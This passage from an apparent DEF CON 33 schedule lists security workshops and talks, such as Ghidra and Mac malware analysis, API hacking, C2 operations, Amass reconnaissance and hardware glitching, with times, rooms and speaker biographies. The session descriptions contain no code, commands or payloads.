    SpeakerBio:  Will McGraw

Will McGraw is a security professional with a background that spans help desk support, security and compliance consulting, and hands-on offensive security. Currently working as a pentester, he focuses on creative attack paths to achieve initial access and persistence in client environments. With over four years in the industry, they bring practical experience and a hacker’s mindset to their research.




Getting started in Malware Analysis with Ghidra

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 1-303 (Malware Village)
When:  Friday, Aug 8, 10:00 – 12:59 PDT

Creator: Malware Village

This workshop gives students a hands-on introduction to using the Ghidra disassembler to navigate and analyze malware. This will be immersive learning with no slides: concepts, strategies, and techniques will be illustrated within the user interface of Ghidra and other supporting tools. A malware sample will serve as the “case study.”


People:
    SpeakerBio:  Wesley McGrew

Dr. Wesley McGrew is a house music DJ that also directs research, development, and offensive cyber operations as Senior Cybersecurity Fellow for MartinFederal. He has presented on topics of penetration testing and malware analysis at DEF CON and Black Hat USA and teaches self-designed courses on software reverse engineering and assembly language programming. Wesley has a Ph.D. in Computer Science from Mississippi State University for his research in vulnerability analysis of SCADA HMI systems.




Go Hack Yourself: API Hacking for Beginners

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 1-405 (Red Team Village)-RTV Track 3
When:  Saturday, Aug 9, 15:00 – 16:50 PDT

Creator: Red Team Village

Over the past few years, we’ve really seen API hacking take off as a field of its own, diverging from typical web app security, yet parallel to it. Often we point to the amorphous blob that is web security and go: “here you go, now you can be a hacker too”, with top 10 lists, write-ups, conference talks and whitepapers smiling as we do. This creates a major challenge for developers who want to test their APIs for security or just people who want to get into API hacking: how on earth do you wade through all the general web security to get to the meat of API hacking, and what do you even need to know? This talk is going to break down API hacking from a developer point of view, teaching you everything you need to know about API hacking, from the bugs you can find and the impact you can cause, to how you can easily test your own work or review your peers. So what are you waiting for? Join me and go hack yourself!


People:
    SpeakerBio:  Katie “InsiderPhD” Paxton-Fear, Principal Security Researcher at Traceable by Harness

Dr Katie Paxton-Fear is an API security expert and a Security Advocate at Semgrep. In her words: she used to make applications and now she breaks them. A former API developer turned API hacker, she has found vulnerabilities in organizations ranging from the Department of Defense to Verizon with simple API vulnerabilities. Dr Katie has been a featured expert in the Wall Street Journal, BBC News, ZDNet, The Daily Swig and more. She shares some of the easy ways hackers can exploit APIs and how they get away without a security alert! Dr Katie regularly delivers security training and security research to some of the largest brands worldwide. She combines easy-to-understand explanations with key technical details that turn security into something everyone can get.




GPON & Discovery

Creator Talk Map Page – LVCC West-Level 2-W224 (Telecom Village)
When:  Saturday, Aug 9, 14:30 – 14:59 PDT

Creator: Telecom Village

Workshop on GPON network security weaknesses and different attack use cases on GPON networks.


People:
    SpeakerBio:  Akib Sayyed, Founder at Matrix Shell

Akib Sayyed is the Founder and Chief Security Consultant of Matrix-Shell Technologies, an India-based telecom-security firm he established in 2014. Recognised industry-wide as a 5G and telecom-signalling security specialist, Akib has spent more than a decade helping mobile-network operators, MVNOs and regulators uncover and remediate vulnerabilities across legacy (2G/3G/4G) and next-generation (5G Core, VoLTE/VoNR/VoWi-Fi) networks. His expertise spans protocol penetration testing (SS7, Diameter, GTP), radio-access assessments and security-automation tooling.

Under Akib’s leadership, Matrix-Shell has grown into India’s first NCCS-designated 5G Core security test lab and holds ISO/IEC 17025 accreditation for its methodology and results. A frequent conference speaker and Black Hat trainer, he also co-organises the Telecom Village community, where he shares latest threat-intel and open-source tools with the wider security ecosystem.

Across consulting engagements, Akib is known for delivering:

  • Policy-aligned testing mapped to 3GPP TS 33.xxx, GSMA FS-series and ITSAR frameworks.
  • Automated scanners that cut signalling-assessment time from weeks to hours.
  • Action-oriented reports complete with PCAP evidence and remediation playbooks.

Driven by a mission to “secure the core,” Akib continues to advise operators on rolling out resilient 5G infrastructure, mentors the next wave of telecom-security engineers and contributes to global standards bodies shaping the future of mobile-network defence.




Hack the Clock: Automating CVE Exploit searches to save time, money, and not get bored.

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 1-405 (Red Team Village)-RTV Track 1
When:  Friday, Aug 8, 14:00 – 14:50 PDT

Creator: Red Team Village

In the fast-paced world of cybersecurity, time is of the essence. As vulnerabilities are discovered and threats evolve, the clock is always ticking, and staying ahead of exploits can feel like a race against time. Enter CVEpwn – an automation tool designed to streamline the search for CVE exploits across multiple platforms like GitHub, ExploitDB, and CXSecurity.

In this talk, we’ll dive into the process of automating CVE exploit searches, demonstrating how CVEpwn cuts down on manual effort, accelerates response times, and enables faster vulnerability mitigation. By automating the search for CVE exploits using multiple platforms and APIs, this tool allows you to focus on what really matters: patching vulnerabilities before they get exploited.


People:
    SpeakerBio:  Jordan Bonagura

Jordan Bonagura is a senior security consultant for Secure Ideas. With more than 20 years of experience in information security, Jordan is passionate about helping companies and clients protect their data and applications from threats and vulnerabilities. As a principal security researcher, he led teams conducting vulnerability management, risk assessments, penetration tests, and boundary-setting to comply with standards for companies in different segments.

Jordan contributed to significant projects, such as developing an integrated GNSS positioning system and an encryption communication protocol between ground and satellite at the Brazilian National Institute of Space Research. He also had the opportunity to speak at some of the most important security conferences around the globe, be a college professor and course coordinator, and consult for the Brazilian police in crime solving.

  • Stay Safe Podcast Founder
  • Founder – Vale Security Conference – Brazilian Conference
  • Consultant Member – Brazilian Commission of High-Tech Crime (OAB / SP)
  • SJC Hacker Space President
  • Speaker (HackMiami, Layer8, RedHackCon, HackSpaceCon, CNASI, AppSec California, GrrCon, BalCCon2k14, BSides Augusta, H2HC, Angeles Y Demonios, Silver Bullet, Seginfo, ITA, INPE, etc)



Hack Your Career with JHaddix

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 4-Communities-C206 (OWASP Community)
When:  Saturday, Aug 9, 12:30 – 14:30 PDT

Creator: OWASP Community

Are you ready to transform your career and unlock new opportunities? Hacking Your Career is a self-paced, actionable course designed to equip you with the tools, strategies, and confidence to stand out in a competitive job market.

What You’ll Learn:

  • Build a personal brand that sets you apart from the competition.
  • Craft resumes and portfolios that hiring managers love.
  • Find hidden job opportunities and network effectively.
  • Master interviews and salary negotiations with ease.

Links:
    Register Here – https://lu.ma/q9kbtu8b

People:
    SpeakerBio:  Jason “jhaddix” Haddix, Field CISO at flare.io

Jason has had a distinguished 20-year career in cybersecurity, previously serving as CISO of Buddobot, CISO of Ubisoft, Head of Trust/Security/Operations at Bugcrowd, Director of Penetration Testing at HP, and Lead Penetration Tester at Redspin.

He has also held positions doing mobile penetration testing, network/infrastructure security assessments, and static analysis.

Jason is a hacker, bug hunter, and is currently ranked 57th all-time on Bugcrowd’s bug bounty leaderboards. Currently, he specializes in recon, web application analysis, and emerging technologies.

Jason has also authored many talks for world-renowned conferences like DEF CON, Bsides, Black Hat, RSA, OWASP, Nullcon, SANS, IANS, BruCon, ToorCon, and many more.


Jason Haddix AKA jhaddix is the CEO and “Hacker in Charge” at Arcanum Information Security. Arcanum is a world class assessment and training company. Jason has had a distinguished 20-year career in cybersecurity previously serving as CISO of Buddobot, CISO of Ubisoft, Head of Trust/Security/Operations at Bugcrowd, Director of Penetration Testing at HP, and Lead Penetration Tester at Redspin. He has also held positions doing mobile penetration testing, network/infrastructure security assessments, and static analysis. Jason is a hacker, bug hunter and currently ranked 57th all-time on Bugcrowd’s bug bounty leaderboards. Currently, he specializes in recon, web application analysis, and emerging technologies. Jason has also authored many talks on offensive security methodology, including speaking at cons such as DEFCON, BSides, BlackHat, RSA, OWASP, Nullcon, SANS, IANS, BruCon, Toorcon and many more.




Hackable.sol – Do you know how to hack smart contracts?

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 2-604 (AppSec Village)-Classroom
When:  Saturday, Aug 9, 10:00 – 12:59 PDT

Creator: AppSec Village

The financial implications of smart contract vulnerabilities are substantial. Smart contracts often handle large amounts of value, and successful exploitation can lead to significant financial losses for users and project developers. In this session I will share the latest smart contract/web3 security trends and vulnerabilities. The attendees will learn how to create tests for security issues in smart contracts written in Solidity, and how to “profit” from it.


People:
    SpeakerBio:  Davide

Davide Cioccia is the founder of DCODX, an ethical hacking and security training firm focusing on DevSecOps and web3. Speaker and trainer at multiple international conferences like Black Hat, HITB, OWASP AppSec, DevSecCon and DEF CON, he is currently leading the DevSecCon Netherlands chapter in Amsterdam.




Hacking Custody and Exchanges

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 4-Communities-C101 (Cryptocurrency Community)
When:  Saturday, Aug 9, 12:00 – 13:50 PDT

Creator: Cryptocurrency Community

Cryptocurrency exchanges have the reputation of keeping ‘not your keys so not your coins’, but we analyze further to understand what technology powers them and which security aspects serve users. In this hour we use tools like Helloex and Octobot to build our own experimental testnet exchange. Your team divides into exchange providers maintaining stability and opportunistic traders taking advantage of system loopholes. A group discussion finally concludes under which conditions cryptocurrency exchanges provide security and value.


People:
    SpeakerBio:  Sky Gul
No BIO available

SpeakerBio:  Andrea
No BIO available



Hacking the Graph: Advanced Target Discovery with OWASP Amass

Creator Talk Map Page – LVCC West-Level 3-W326 (Bug Bounty Village)
When:  Saturday, Aug 9, 16:30 – 17:30 PDT

Creator: Bug Bounty Village

In today’s bug bounty landscape, advantage goes to those who can see what others miss. The OWASP Amass Project has long equipped researchers with powerful tools for internet asset discovery, but its newest addition—assoc—takes things to the next level. This talk introduces assoc, a tool that allows hunters to explore the Open Asset Model through custom association triples, a concept inspired by RDF triples used in knowledge graphs. These user-defined relationships enable highly targeted queries across a rich graph of internet data, revealing non-obvious associations between domains, IP addresses, certificates, and legal entities.

Attendees will learn how assoc empowers them to define their own asset discovery logic, conduct complex association walks through the graph, and surface infrastructure that traditional scanners and passive methods overlook. Whether you’re pivoting off a supplier’s ASN, correlating certificate reuse across sub-brands, or mapping out a shadow IT network tied to a legal entity, assoc offers an unmatched level of flexibility and precision. Live demos will show how to craft custom triples, execute walks, and extract actionable intelligence—all with an eye toward real-world bug bounty impact. If you’re ready to out-hack the competition, this is a talk you won’t want to miss.


People:
    SpeakerBio:  Jeff “caffix” Foley, Founder & Project Leader, OWASP AMASS at OWASP

Jeff Foley has over 20 years of experience in information security, focusing on research & development, security assessment, and attack surface management. During the last eight years, Jeff identified a lack of situational awareness in traditional information security programs and shifted his attention to this vital function. He is now the Project Leader for Amass, an OWASP Foundation Flagship Project that provides the community with guidance and tooling for in-depth attack surface mapping and asset discovery. Jeff has assisted various companies with attack surface management and has been invited to speak at conferences. In past lives, Jeff was the Vice President of Research at ZeroFox, focused on proactive cybersecurity outside the traditional corporate perimeter. He also served as the Global Head of Attack Surface Management at Citi, one of the largest global banks, and started their first program addressing exposure management. Jeff began his career serving the United States Air Force Research Laboratory as a contractor specializing in cyber warfare research and development. He concluded his government contracting at Northrop Grumman Corporation, where he performed the roles of Subject Matter Expert for Offensive Cyber Warfare Research & Development and Director of Penetration Testing. In these roles, he also developed a penetration testing training curriculum for the Northrop Grumman Cyber Academy and taught trainers to utilize the material across this international organization. During his time in this profession, Jeff has taught at various academic institutions on offensive security, cloud security, and attack surface management.




Hardware Hacking: Glitching Lab

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 1-401 (Embedded Systems Village)
When:  Sunday, Aug 10, 10:00 – 11:59 PDT
Saturday, Aug 9, 10:00 – 17:59 PDT
Friday, Aug 8, 10:00 – 17:59 PDT

Creator: Embedded Systems Village

Curious about hacking chips using fault-injection? Take your first steps in our (free) glitching workshops! We provide you with hardware & guidance to conduct your first fault-injection attacks, all you need is a laptop running Python & OpenOCD: Reproduce the nRF52 “AirTag” glitch or learn how to glitch one of the chips used in crypto-wallets to store millions of dollars.




Hybrid Attack

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 1-405 (Red Team Village)-RTV Track 1
When:  Friday, Aug 8, 15:00 – 15:50 PDT

Creator: Red Team Village

This workshop will provide an in-depth, practical demonstration of how real-world Red Team operations are conducted, focusing on the physical aspect of intrusion. We will walk through the entire lifecycle of an engagement, from intelligence gathering and planning to execution and exfiltration.

Unlike operations in other regions, this case study is set in a Brazilian environment, where high crime rates, armed security, and unpredictable urban risks add a unique layer of complexity to physical Red Team engagements. Security personnel in Brazil often rely on physical force and firearms rather than solely procedural measures, making adversarial simulation far more challenging and dangerous.

This session aims to expose security professionals to the often-overlooked risks posed by hybrid attacks and demonstrate why organizations—especially in high-risk regions—must integrate physical security, cybersecurity, and situational awareness to build a comprehensive defense strategy against evolving threats.

Due to high crime rates and frequent security threats, Brazilian companies must adopt stricter policies and proactive security measures to mitigate risks. The increasing sophistication of both criminal organizations and Red Team adversaries forces companies to rethink their physical and cybersecurity defenses, imposing more restrictive controls, robust employee training, and continuous security assessments to ensure resilience against real-world hybrid threats.

Participants will gain insights into advanced Red Team techniques used to bypass security controls, leveraging real-world tactics such as social engineering, badge cloning, physical intrusion, and covert device placement, all while considering the unique security landscape of Brazil. Through a detailed case study, we will showcase how an operation successfully led to the extraction of a sensitive financial document and the installation of a rogue device—in an environment where the risk of exposure carries real-world consequences beyond mere detection.


People:
    SpeakerBio:  Jonathan Coradi

Jonathan Coradi works as a RedTeam Operator at Hakai Security and has over 7 years of experience in cybersecurity, working as an Offsec Leader in several companies in the industrial, financial and banking sectors in Brazil, focusing on penetration testing, Red Team operations, and physical operations. He also works as a BugHunter, ranking Top 1 on the Bug Bounty platform BugHunt, in addition to finding vulnerabilities in Microsoft, Uber, Mercado Livre, among others.




ICS Fundamentals

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 2-805 (ICS Village)
When:  Saturday, Aug 9, 14:00 – 15:30 PDT
Sunday, Aug 10, 10:30 – 11:59 PDT
Friday, Aug 8, 10:30 – 11:59 PDT
Friday, Aug 8, 14:00 – 15:30 PDT
Saturday, Aug 9, 10:30 – 11:59 PDT

Creator: ICS Village



Reverse engineering of (wireless) devices (ESP)

Creator Talk Map Page – LVCC West-Level 2-W220-W221 (La Villa Community)-Workshops
When:  Saturday, Aug 9, 14:00 – 15:59 PDT

Creator: La Villa

Talk or workshop of adaptable length and content.

Hardware reverse engineering can become tedious without a methodology to help with the process. On the other hand, we leave our security in the hands of easily vulnerable devices, such as alarm sensors and gate automation systems. That is why this talk is proposed, so that a person with no prior knowledge has all the elements needed to determine whether those devices are secure.

Although the talk covers varied technical concepts, from using an oscilloscope and capturing samples with logic analyzers and SDR to understanding conceptually how a board works, it is aimed at an audience with no prior knowledge, since simple language is used at all times to explain them.

(context)
I give this talk at eko in the hardware hacking village, but it was never recorded. Attendees have ranged from 15-year-olds who are just starting out to adults with a lot of experience.


People:
    SpeakerBio:  Mariano Marino, Senior security consultant @ Websec Mexico

Programmer and security consultant at Websec and leader of the hardware hacking village at ekoparty.




Intersection of the security and cryptographic architecture [Workshop]

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 1-403 (Crypto Privacy Village)
When:  Saturday, Aug 9, 15:30 – 16:59 PDT

Creator: Crypto Privacy Village

In this talk, I will present my analysis of the security and cryptographic architecture of Ente, an alternative to Google Photos. The aim is to demonstrate how application security and cryptography intersect to provide an end-to-end secure solution.

This talk will guide beginners through key concepts such as using a Key Derivation Function (KDF) to generate encryption keys, the purpose and use of envelope encryption, how to share photos using public key cryptography, and much more. Along with the theoretical concepts, I will show how this can be implemented in a secure library such as libsodium. By the end, attendees should be able to understand and reason about similar systems in the real world—and, if needed, take a shot at building one themselves.


People:
    SpeakerBio:  Pushkar Jaltare, Security Architect at Fastly

Pushkar Jaltare is a Security Architect at Fastly, a leading Edge computing and Content Delivery Network. He acts as a security subject matter expert for different product lines, which include Edge Compute, Content Delivery, and Fastly’s WAF. He is also responsible for evaluating the security, privacy, and governance of SaaS vendors utilized by Fastly. His previous experience includes a stint at AWS, where he performed design reviews for widely used AWS services. He holds a Master’s degree in Information Assurance from Northeastern University and is an expert in the fields of Application Security, Cryptography, Web Application Security, and Network Security.




Intro to Ciphers [Mini Workshop/Talk]

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 1-403 (Crypto Privacy Village)
When:  Sunday, Aug 10, 10:30 – 10:45 PDT

Creator: Crypto Privacy Village

People:
    SpeakerBio:  Crypto Privacy Village Staff
No BIO available



Intro to Python – breakin’ it down

Creator Talk Map Page – LVCC West-Level 2-W230 (DC NextGen)
When:  Saturday, Aug 9, 10:30 – 11:30 PDT

Creator: DC NextGen

We take a different approach to learning Python programming – we break stuff! In this session we use the Thonny development tool to step line by line through a python program and to learn the principles of variables, input and output, making code reusable, and working with data stored in files. We will see what each line of python code does and how we can use that to create our own programs!


People:
    SpeakerBio:  Bradán Lane, Bradán Lane Studios

Bradán graduated third grade with a degree in crayon. This, combined with his unwavering belief in “how difficult could it be”, has made him eminently qualified to wash dishes. His background in UX Designer & User Research and as a purveyor of personas demonstrates his profound talent for making stuff up with confidence. Bradán pre-dates the internet and ARPANET.




Introducing OWASP Amass v5.0

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 4-Communities-C206 (OWASP Community)
When:  Friday, Aug 8, 15:00 – 16:59 PDT

Creator: OWASP Community

The OWASP Amass Project has become a foundational toolset for security researchers, bug bounty hunters, red teamers, and defenders who rely on automated reconnaissance and external asset discovery to map attack surfaces. With the release of Amass v5.0, the project has undergone a major architectural transformation centered around the Open Asset Model (OAM)—a structured property graph that defines how Internet-facing assets and their relationships are stored, analyzed, and queried.

This two-hour hands-on workshop, led by Jeff Foley, the project’s founder and long-time maintainer, offers attendees a first look at Amass v5.0’s new intelligence collection engine, which seamlessly populates the Open Asset Model database during enumeration operations. The session will walk through how Amass collects and organizes OSINT from various sources—including DNS records, WHOIS/RDAP data, TLS certificates, and more—and models the results as a dynamic graph of properties and relationships between discovered assets.

Participants will learn to use core Amass tools such as:

amass enum – for deep, recursive asset discovery using passive and active techniques

amass subs – for quick subdomain discovery from the Open Asset Model database

amass viz – to render interactive visualizations of asset relationships in the Open Asset Model

In addition to these staples, the workshop will introduce the new assoc tool, a powerful query interface designed to unlock the true potential of the Open Asset Model database. Built around a custom Triples query language, the assoc tool enables users to describe paths—called association walks—through the asset graph, surfacing linked insights across related properties (e.g., domains associated with a network, IPs linked to DNS records, etc.). The language is inspired by RDF-style triples but optimized for simplicity and clarity in cybersecurity investigations.

Amass v5.0 also ships with completely refactored documentation, providing diagrams to help users understand the data types, their fields, and their associations within the OAM. This new documentation dramatically lowers the learning curve for users new to the Amass Project, making it easier to build mental models of how different types of Internet assets are discovered and interrelated.

This workshop will include a live walkthrough of setting up and running Amass v5.0, from enumeration to advanced queries. Participants will leave with hands-on experience using the full Amass suite, understanding how the Open Asset Model works under the hood, and writing association walk queries using Triples.

What to Expect:

Real-world reconnaissance examples using Amass against publicly available targets

Query design exercises with assoc to extract actionable intelligence

Tips for integrating Amass data into your own tooling and pipelines

Visual mapping of organizational assets using OAM and viz

Level: Intermediate. Some experience with OSINT tools, command-line interfaces, or network security is recommended but not required. The workshop is designed to be self-contained and accessible.

Attendees are encouraged to bring a laptop and follow along. Project contributors will be present throughout the session to provide hands-on support, answer questions, and help troubleshoot issues in real time, making this a highly interactive experience.

By the end of the session, participants will walk away with practical skills in reconnaissance, data extraction from structured asset models, and a solid understanding of how Amass v5.0 is redefining modern Internet-wide discovery.

Join us at DEF CON to explore the future of OSINT automation and asset intelligence with OWASP Amass!

Links:
    Register Here – https://lu.ma/hf83v61c

People:
    SpeakerBio:  Jeff “caffix” Foley, Founder & Project Leader, OWASP AMASS at OWASP

Jeff Foley has over 20 years of experience in information security, focusing on research & development, security assessment, and attack surface management. During the last eight years, Jeff identified a lack of situational awareness in traditional information security programs and shifted his attention to this vital function. He is now the Project Leader for Amass, an OWASP Foundation Flagship Project that provides the community with guidance and tooling for in-depth attack surface mapping and asset discovery. Jeff has assisted various companies with attack surface management and has been invited to speak at conferences. In past lives, Jeff was the Vice President of Research at ZeroFox, focused on proactive cybersecurity outside the traditional corporate perimeter. He also served as the Global Head of Attack Surface Management at Citi, one of the largest global banks, and started their first program addressing exposure management. Jeff began his career serving the United States Air Force Research Laboratory as a contractor specializing in cyber warfare research and development. He concluded his government contracting at Northrop Grumman Corporation, where he performed the roles of Subject Matter Expert for Offensive Cyber Warfare Research & Development and Director of Penetration Testing. In these roles, he also developed a penetration testing training curriculum for the Northrop Grumman Cyber Academy and taught trainers to utilize the material across this international organization. During his time in this profession, Jeff has taught at various academic institutions on offensive security, cloud security, and attack surface management.




Introduction to Operationalizing & Using C2 (w/ some AI)

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 1-405 (Red Team Village)-RTV Track 1
When:  Saturday, Aug 9, 13:00 – 14:50 PDT

Creator: Red Team Village

In this workshop we will start from scratch with nothing more than a GCP project. The only requirement to participate in this workshop is a laptop with an internet connection. We will deploy a virtual machine, install and configure the Mythic C2 Server. We will deploy a virtual machine, deploy and configure the Nemesis offensive data enrichment pipeline and operator support system. We will deploy a mythic-connector to send data automatically from Mythic to Nemesis. We will compromise a vulnerable application and deploy a Mythic C2 agent to said application, then exfiltrate data. We will clone my custom fork of RAGnarok locally and process said data from Nemesis using local, offline AI LLM models. (This can also be done in the cloud but I won’t be providing cloud GPU instances for obvious reasons.) We will then use the insights from this data to compromise another more secure host.


People:
    SpeakerBio:  Gabi Joseph

I have been Red Teaming for 4 years with an academic background in AI/ML.

SpeakerBio:  Josh Millsap

I am on the Red Team for Palo Alto Networks. I lead the development, automation, and AI efforts for the team.




Just a TIP: DIY Your First Threat and Adversary Intelligence Platform

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 2-702 (Adversary Village)-Workshop Area
When:  Sunday, Aug 10, 11:00 – 11:59 PDT

Creator: Adversary Village
Links:
    adversaryvillage.org/adversary-events/DEFCON-33/Ashley-Stryker – https://adversaryvillage.org/adversary-events/DEFCON-33/Ashley-Stryker

People:
    SpeakerBio:  Ashley Stryker, Threat Intelligence Analyst at GEICO Tech
No BIO available



Legally Dubious Incident Response Tabletop

Creator Talk Map Page – LVCC West-Level 2-W234 (Policy @ DEF CON)
When:  Friday, Aug 8, 12:30 – 13:50 PDT

Creator: Policy @ DEF CON

“Why can’t we just drone strike the ransomware operators in Russia?” “Can’t you just hack the threat actor’s servers and get our data back?” “If we don’t know about the fraud, we’re not legally responsible for it, right?” – Real Stroz Friedberg Client Questions, including one from CEO of a Fortune500 company

John and Heidi will lead an interactive, dynamic, and entertaining incident response tabletop session based on their years of experience and working on hundreds of incident responses together. They will walk through the details of a typical ransomware attack, while highlighting the legal frameworks and decision points that arise throughout the lifecycle of the investigation. From payment to OFAC-listed threat actors, to SEC disclosure rules, to that pesky CFAA, participants will be asked to engage at each inject. Participants will gain a deeper appreciation for the multitude of tradeoffs and difficult decisions business, technical, and legal stakeholders must make during an incident while operating within various legal and regulatory frameworks. Together, the presenters and participants will explore the potential ethical and policy positions that could alter or enhance the way incident response is handled in the future.


People:
    SpeakerBio:  Heidi Wachs, Stroz Friedberg

Heidi L. Wachs is Managing Director, Engagement Management, and head of the Washington, D.C. office of Stroz Friedberg, where she helps clients prepare for and respond to data breach and cybersecurity incidents and develop and implement data privacy and information security programs. Ms. Wachs oversees complex investigations involving the collection, use, and sharing of data and personal information, in particular through the use of APIs, scraping, hacking, cookies, and other third-party web page integrations. Ms. Wachs’ experience includes serving as a technical analyst and Chief Privacy Officer for a leading national research university. Ms. Wachs earned her B.A. in Journalism from Lehigh University and her J.D. from the Benjamin N. Cardozo School of Law. She is admitted to the bars of the District of Columbia and the United States Supreme Court.

SpeakerBio:  John W. Ailes, VI, Stroz Friedberg

John W. Ailes, VI is a DFIR Manager at Stroz Friedberg, where he leads and supports technical investigations into economically motivated cybercrime, state sponsored intrusion, and other forms of complex digital investigation. Mr. Ailes holds GIAC Certified Forensic Analyst, GIAC Certified Forensic Examiner, and GIAC Certified Reverse Engineering Malware certifications from the SANS institute and a B.S. in Cyber Security Engineering from George Mason University.

SpeakerBio:  Nathan Salminen, Cybersecurity Lawyer at Hogan Lovells

Nathan Salminen is a cybersecurity lawyer at Hogan Lovells where he has helped clients prepare for and respond to hundreds of cybersecurity incidents, ranging from everyday business email compromises to massive data breaches and incursions by nation-state threat actors into companies in the financial or energy sectors. Before becoming a lawyer, Nathan worked as a software engineer and manager of technical teams for 13 years and completed the OSCP certification.




Let’s Break Enigma!

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 4-Communities-C101 (Cryptocurrency Community)
When:  Saturday, Aug 9, 12:00 – 13:50 PDT

Creator: Cryptocurrency Community

Enigma was the infamous German encryption machine that was used in World War 2. A group of British cryptographers successfully broke the sophisticated machine, and in doing so, gave rise to modern adversarial cryptography and the Turing Machine, which would later evolve into the computer. In this workshop, we will look at how adversarial cryptography initially formed and how many of the techniques used still apply today. Additionally, many of the mathematical principles used in both the construction of the Enigma machine and its subsequent breaking are used heavily in modern encryption, which directly relate to the technology used in cryptocurrency.


People:
    SpeakerBio:  Rigo Salazar

Rigo Salazar is a Gen Z who is a Millennial in spirit with a Master’s degree in Mathematics and a Bachelor’s in Civil Engineering… for some reason. Jigsaw puzzles, puppetry, and platforming are a handful of his hobbies, but his true loves are his family, friends, and prime numbers. With boisterous whimsy and the volume to match, Rigo is so excited for his second Defcon and the opportunity to talk about cryptography.

SpeakerBio:  Luke Szramowski

Luke Szramowski is a mathematical researcher, with a Bachelor’s Degree in Mathematics and two Master’s Degrees, one in Math, with a focus in Number Theory and another in Math with a focus in Coding Theory. In his free time, Luke works on a litany of different math problems, mainly regarding Number Theoretic conjectures and playing all different types of games. He is very excited to talk about any cryptography related questions and is looking forward to his first DEF CON.




Let’s Lose the Shock-Mystery of Linux – A Pain-free Intro

Creator Talk Map Page – LVCC West-Level 3-W322-W324 (Blacks In Cyber Village)
When:  Friday, Aug 8, 11:00 – 11:59 PDT

Creator: Blacks In Cyber Village

The Linux operating system is a gateway to accomplishing numerous tasks in our hacking community, whether it is writing code in dozens of languages for free or using any manner of commands and tools for any task. While Linux is phenomenally powerful for many, it can be intimidating to persons who have not used it. We want to remove the intimidation. In this talk we describe what Linux is, we go over some key elements that we encounter in using it, and we compare some Linux elements with Microsoft Windows.


People:
    SpeakerBio:  D.J. Davis

D.J. Davis started his academic and work life on IBM mainframes and midrange systems in Operations and Development. After a decade of Development, he has worked in Systems Engineering, Network Engineering, WAN Design Engineering, IT Integration, Telecom Sustaining Engineering, and Information Security. D.J. holds a BS and MS in Business, Information Systems. He works in the Washington DC area.




Level UP OSINT

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 1-405 (Red Team Village)-RTV Track 4
When:  Saturday, Aug 9, 15:00 – 15:50 PDT

Creator: Red Team Village

Dive into the dynamic world of Open Source Intelligence (OSINT) with this quick workshop designed to give you a taste of practical online investigations and threat hunting. Led by a seasoned professional, this immersive session offers a condensed yet impactful introduction to essential OSINT techniques that you can use in your red teaming engagements.

Experience the power of hands-on learning as you engage in live demonstrations, exploring key concepts such as operational security (OpSec), advanced search engine queries, username and phone number lookups, social media reconnaissance, breached records analysis, network reconnaissance, historical records, and essential documentation, all within the span of this engaging workshop. Through interactive exercises and guided discussions, participants will gain a glimpse into the world of OSINT.

Who’s it for?

This training is suited for all individuals in any field with a keen interest in online investigations, regardless of their experience level in OSINT.


People:
    SpeakerBio:  Mishaal Khan, Privacy Expert

Mishaal is a subject matter expert in cybersecurity, pentesting, privacy, Open Source Intelligence and social engineering and a frequent speaker on these topics at Universities and popular cybersecurity conferences like DEF CON, Black Hat, Wild West Hackin Fest, TEDx, and multiple BSides Security events.

Mishaal has worked with multinational companies for over 20 years, securing their networks and providing executive level consultancy as a CISO to manage risk and avoid breaches. He’s the author of the book The Phantom CISO, runs a cybersecurity practice as a vCISO and owns a privacy management and investigations firm.




Leveraging AI and MCP Servers for Automated External Attack Surface Testing

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 1-405 (Red Team Village)-RTV Track 2
When:  Friday, Aug 8, 14:00 – 14:50 PDT

Creator: Red Team Village

This talk dives into how Artificial Intelligence (AI) combined with Model Context Protocol (MCP) can revolutionize external attack surface testing. Attendees will learn repeatable, low-effort techniques to identify exposed assets, prioritize risks, and automate vulnerability discovery using AI-driven insights.


People:
    SpeakerBio:  Shane Krause

Shane Krause is a 25-year-old cybersecurity professional who broke into offensive security two years ago, fueled by a lifelong passion for technology and problem-solving. As a penetration tester, Shane Krause enjoys identifying vulnerabilities, simulating real-world attacks, and helping organizations strengthen their defenses. Outside of work, Shane Krause is an avid gamer who values connecting with others in the cybersecurity community and sharing knowledge to grow together in the field.




Mac Malware Analysis

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 1-303 (Malware Village)
When:  Saturday, Aug 9, 14:00 – 17:59 PDT

Creator: Malware Village

As Macs continue to gain popularity, the volume and sophistication of malware targeting Apple’s desktop platform is also on the rise. This hands-on introductory workshop is designed for anyone curious about how macOS malware works and how to effectively analyze it. Led by Mac security expert and author Patrick Wardle, the session covers the fundamentals of macOS malware analysis. You’ll examine real-world threats to understand how they function under the hood and learn to use simple yet powerful tools to dissect these malicious programs.

No prior experience with macOS malware is required. Whether you’re a student, a security enthusiast, or just getting started in the field, this workshop will provide a solid foundation and the practical skills needed to begin analyzing threats and thinking like a Mac defender.


People:
    SpeakerBio:  Patrick Wardle

Patrick Wardle is the founder of the Objective-See Foundation, the CEO/Cofounder of DoubleYou, and the author of “The Art of Mac Malware” book series. Having worked at NASA and the NSA, as well as presenting at countless security conferences, he is intimately familiar with aliens, spies, and talking nerdy. Passionate about macOS security, Patrick spends his days discovering Apple 0days, studying macOS malware, and releasing free open-source security tools to protect Mac users.




MalSIM: Building

Creator Talk Map Page – LVCC West-Level 2-W224 (Telecom Village)
When:  Friday, Aug 8, 13:00 – 13:59 PDT

Creator: Telecom Village

Deep dive into Android’s eSIM management APIs and how they can be abused.

Building and analyzing a proof-of-concept malware for silent eSIM installation and location harvesting.

Understanding telecom backend provisioning vulnerabilities enabling malicious profile injection.

